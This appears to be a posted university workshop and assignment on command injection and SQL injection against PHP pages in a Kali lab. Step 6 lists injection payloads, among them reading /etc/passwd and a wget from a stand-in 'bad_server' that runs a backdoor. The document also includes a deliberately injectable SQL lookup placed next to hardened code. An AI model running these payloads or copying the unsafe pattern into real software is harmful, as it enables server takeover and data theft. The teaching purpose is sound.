
This is my assignment.


Important: As usual, please write details of what you did to get full points.

1. (0.5 point) Go to http://10.8.0.240/agent.php to get the secret *
2. (0.5 point) Go to http://10.8.0.240/admin.php to get the secret *
3. (0.5 point) Go to http://10.8.0.240/method.php to get the secret *
4. (0.5 point) Go to http://10.8.0.240/help.php to get the secret *
5. (1.0 point) Go to http://10.8.0.240/login.php to get the secret **
6. (1.0 point) Go to http://10.8.0.240/superhero.php to get the secret **
7. (2.0 point) Go to http://10.8.0.240/guess.php to get the secret ***
8. (1.0 point) Go to http://10.8.0.240:81/ping.php to get the secret **
9. (2.0 point) Go to http://10.8.0.240:82/doa.php to get the secret ****
10. (1.0 point) Go to http://10.8.0.240:83/fortune.php to get the secret **

Notes & Hints:
· You have to be connected to the Hacklab VPN to access these pages.
· The * indicates the difficulty of the puzzle.
· Q5 and Q6 (login and superheroes questions) - please solve these manually, and DO NOT use sqlmap! I have added a 0.5 sec sleep() on the PHP side to discourage sqlmap...
· Q7 - you can use sqlmap or, if you prefer, your own script.
· Note the port numbers for Q8, Q9 and Q10 (there is a reason why I am running these on separate containers...).

Overview and Objectives

In this workshop, we will start to look at attacking and defending web-based applications.
· Part 1 (this week) - command injection and SQL injection attacks
· Part 2 (next week) - cross-site scripting (XSS), cross-site request forgery (CSRF), etc.

Simple command injection example
1. In your Kali Linux instance, start Apache2 as follows (note that systemctl ends with the letter "l" rather than the digit "1"):

   a1112407@kali:~$ sudo systemctl start apache2
   a1112407@kali:~$ sudo systemctl enable apache2

2. Check that the default page is accessible via Firefox (http://localhost). You might see something different if you did Workshop 0x07.

3. Enable PHP error messages to help debugging in case you make typos (without this setting, PHP just shows a blank page when there is an error... not very friendly):

   a1112407@kali:~$ sudo sed -i -e '/display_errors =/ s/= .*/= on/' /etc/php/7.3/apache2/php.ini

4. Create a .php file with the following code and save it under /var/www/html as ping.php. This is a simple online PHP page that pings a host for you (there are real services like this; e.g., https://www.site24x7.com/ping-test.html).

   [The ping.php listing did not survive extraction. All that remains of it is a "Welcome to the Ping Server" heading, an "IP:" input field, and the closing lines that print the ping output: print("{$cmd}"); } ?>]

5. Test the PHP from Firefox to see how it works. NOTE: if you are failing to get the PHP code to run, check the following: (1) check that the PHP file has permission 755 (or just chmod o+r); (2) check that PHP is enabled (# a2enmod php7.3); (3) restart Apache2 just in case (# systemctl restart apache2).

6. The PHP code, simple as it is, has a serious flaw. What happens when you submit these values in the form?

   127.0.0.1; ls /
   or
   127.0.0.1; cat /etc/passwd
   or
   127.0.0.1; wget https://bad_server/backdoor; backdoor 4444

   I hope you get the idea! Arbitrary code execution, and with minimum effort an adversary can have full control of the web server! The attack takes advantage of the fact that you can execute multiple shell commands by separating them with ";".

7. (Naive input filter) Suppose you modify the PHP code slightly to filter out the ";" character by adding this line to the PHP code:

   $ip = preg_replace("/;/","",$ip);

   You can still get around this filter by using other shell operators (&, &&, ||) to pass multiple commands to the shell, so this is clearly not enough to prevent command injection attacks.

Client-Side Validation

1. With HTML5 you can implement simple client-side validation using the "pattern" attribute with a regex in the input tag, along with a "title", like this:

   [The input tag itself did not survive extraction; only its label "IP:" remains.]

   When you enter an injection attack you get this error: [the browser's validation message did not survive extraction]

2. So now the attacker can only submit the IPv4 dotted format? Unfortunately, client-side validation can easily be overcome. The simplest way is to reload, hit F12 to enter developer mode, and get rid of the "pattern" attribute!

Server-Side Validation

The most secure way is to implement a whitelist-style user input validation on the server side like this, using the PHP regex matching function preg_match:

   if (preg_match("/^([0-9]{1,3}\.){3}[0-9]{1,3}$/", $ip)) {
       $cmd = shell_exec('ping -c 4 ' . $ip);
       print("{$cmd}");
   } else {
       print("Invalid IPv4 format!");
   }

The best practice is to do both client-side (for better UX) and server-side (to prevent attacks) validation. Here is the final code for the ping server. Please test it on your local instance - attack it with all your might, and make sure it's unbreakable!!
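Because the workshop's own final listing for ping.php did not survive, here is a complete hardened version as an added example (my code, not the workshop's): it keeps the page's client-side pattern attribute and the server-side preg_match whitelist, and goes one step further with filter_var() to reject octets above 255, escapeshellarg() as a second layer in front of shell_exec(), and htmlspecialchars() on the output. The POST method and the field name "ip" are assumptions.

```php
<?php
// Added example, not the workshop's listing. Field name "ip" and POST method
// are assumptions; the regex is the workshop's server-side whitelist.
declare(strict_types=1);

function is_ipv4_dotted(string $ip): bool
{
    // Workshop whitelist: exactly four 1-3 digit groups. It still accepts
    // values such as 999.999.999.999, hence the second check below.
    return preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $ip) === 1;
}

function is_ipv4_strict(string $ip): bool
{
    // Defence in depth: PHP's own parser confirms every octet is 0-255.
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
}

function run_ping(string $ip): string
{
    // Validation is the real control; escapeshellarg() is a second layer so
    // the value reaches the shell as one quoted argument whatever it holds.
    return (string) shell_exec('ping -c 4 ' . escapeshellarg($ip));
}
?>
<h1>Welcome to the Ping Server</h1>
<form method="post">
  IP: <input type="text" name="ip"
             pattern="([0-9]{1,3}\.){3}[0-9]{1,3}"
             title="IPv4 dotted format, e.g. 127.0.0.1">
  <input type="submit" value="Ping">
</form>
<?php
if (isset($_POST['ip']) && is_string($_POST['ip'])) {
    $ip = trim($_POST['ip']);
    if (is_ipv4_dotted($ip) && is_ipv4_strict($ip)) {
        // htmlspecialchars() stops ping's output being rendered as HTML.
        print('<pre>' . htmlspecialchars(run_ping($ip)) . '</pre>');
    } else {
        print('Invalid IPv4 format!');
    }
}
?>
```

Save it under /var/www/html and retry the three payloads from step 6: each now fails the whitelist before shell_exec() is ever reached.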

[The workshop's final ping.php listing did not survive extraction. What remains: the "Welcome to the Ping Server" heading, the "IP:" field, and the closing lines print("{$cmd}"); } else { print("Invalid IPv4 format!"); } } ?>]

SQL Injection - Building a Simple Dynamic Server

To appreciate SQL injection, let's build a simple dynamic web server that queries data from a MySQL database. Kali has MariaDB (MySQL) installed by default. You just have to start it and log in as "root" to begin.

1. In Kali, start MySQL and log in as root as follows:

   a1112407@kali:$ sudo systemctl start mysql
   a1112407@kali:$ sudo mysql
   Welcome to the MariaDB monitor.  Commands end with ; or \g.
   Your MariaDB connection id is 38
   Server version: 10.3.12-MariaDB-2 Debian buildd-unstable

   Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

   Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

   MariaDB [(none)]>

2. Create a new database called "workshop8":

   MariaDB [(none)]> create database workshop8;
   Query OK, 1 row affected (0.001 sec)

3. Create a new user "dbuser" and grant it all privileges on the newly created database. Feel free to change the password to a better one...

   MariaDB [(none)]> grant all privileges on workshop8.* to 'dbuser'@'localhost' identified by 'password123';
   Query OK, 0 rows affected (0.000 sec)

4. Quit by typing "quit", then log in again as the newly created dbuser:

   a1112407@kali:$ mysql -u dbuser -p -D workshop8

5. Using the "create table" SQL statement, create a new table called "students" with the fields "id", "name", "password" and "grade":
   MariaDB [workshop8]> create table students (id INT NOT NULL AUTO_INCREMENT, name VARCHAR(40) NOT NULL, password VARCHAR(40) NOT NULL, grade VARCHAR(2) NOT NULL, PRIMARY KEY (id));

   You can list the current tables in the database and their schema as follows:

   MariaDB [workshop8]> show tables;
   +---------------------+
   | Tables_in_workshop8 |
   +---------------------+
   | students            |
   +---------------------+
   1 row in set (0.000 sec)

   MariaDB [workshop8]> describe students;
   +----------+-------------+------+-----+---------+----------------+
   | Field    | Type        | Null | Key | Default | Extra          |
   +----------+-------------+------+-----+---------+----------------+
   | id       | int(11)     | NO   | PRI | NULL    | auto_increment |
   | name     | varchar(40) | NO   |     | NULL    |                |
   | password | varchar(40) | NO   |     | NULL    |                |
   | grade    | varchar(2)  | NO   |     | NULL    |                |
   +----------+-------------+------+-----+---------+----------------+
   4 rows in set (0.004 sec)

6. Insert some dummy data using the "insert" SQL statement. Note: we have used SHA1 for simplicity for hashing passwords, but as we learnt in the cryptography class, this IS NOT a secure way to store passwords, as it is prone to offline attacks.

   insert into students (name, password, grade) values ('Ryoma', sha1('password123'), 'A');
   insert into students (name, password, grade) values ('Kaoru', sha1('pretzels'), 'B');
   insert into students (name, password, grade) values ('Higa', sha1('princeoftennis'), 'F');

   You can confirm the list of students with the SQL statement "select * from students;" or query particular students with "select * from students where grade='F'", etc.

   MariaDB [workshop8]> select * from students where grade='F';
   +----+------+------------------------------------------+-------+
   | id | name | password                                 | grade |
   +----+------+------------------------------------------+-------+
   |  3 | Higa | e7e363b9881f8dbcc52e877b496533aa49c20a6d | F     |
   +----+------+------------------------------------------+-------+
   1 row in set (0.000 sec)

7. Now create this simple login PHP form (or download it from here). The PHP file shows a login form if there is no active session, and just shows some user info if there is an active session.

   [Only the tail of the login.php listing survived extraction:]

   ... query($sql)) {
       if ($res->num_rows > 0) {
           $row = $res->fetch_assoc();
           $_SESSION['id'] = $row['id'];
           $_SESSION['name'] = $row['name'];
           $_SESSION['grade'] = $row['grade'];
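The rest of login.php is cut off above, so here is the database lookup as an added example (my code, not the workshop's file), written both the way the surviving fragment implies, with the form values spliced into $sql, and with a mysqli prepared statement, which keeps user input from ever being parsed as SQL. The function names, the form fields "name" and "password", and the use of mysqlnd's get_result() are assumptions; the students table, the sha1() hashing and the dbuser credentials are the workshop's.

```php
<?php
// Added example, not the workshop's login.php. Function names, the form
// fields "name"/"password" and mysqlnd's get_result() are assumptions;
// the students table, sha1() hashing and dbuser credentials are the workshop's.
declare(strict_types=1);
session_start();

// The pattern the workshop's form starts from: the submitted values are
// spliced into the SQL text, so a quote in the input changes the query.
function lookup_unsafe(mysqli $db, string $name, string $pass): ?array
{
    $sql = "SELECT id, name, grade FROM students "
         . "WHERE name='$name' AND password=sha1('$pass')";
    $res = $db->query($sql);
    return ($res && $res->num_rows > 0) ? $res->fetch_assoc() : null;
}

// Hardened: the SQL text is fixed at prepare() time and both values travel
// as bound parameters, so the database never parses user input as SQL.
function lookup_safe(mysqli $db, string $name, string $pass): ?array
{
    $stmt = $db->prepare(
        'SELECT id, name, grade FROM students WHERE name = ? AND password = sha1(?)'
    );
    $stmt->bind_param('ss', $name, $pass);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

if (isset($_POST['name'], $_POST['password'])
    && is_string($_POST['name']) && is_string($_POST['password'])) {
    $db = new mysqli('localhost', 'dbuser', 'password123', 'workshop8');
    $row = lookup_safe($db, $_POST['name'], $_POST['password']);
    if ($row !== null) {
        session_regenerate_id(true);   // fresh session id on login
        $_SESSION['id'] = $row['id'];
        $_SESSION['name'] = $row['name'];
        $_SESSION['grade'] = $row['grade'];
        print('Welcome, ' . htmlspecialchars($row['name']) . '!');
    } else {
        // One message for both unknown user and wrong password.
        print('Login failed.');
    }
}
?>
```

Swap lookup_safe() for lookup_unsafe() in the call above to see the difference for yourself: the prepared statement returns a row only for the three exact name/password pairs you inserted in step 6.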
May 07, 2021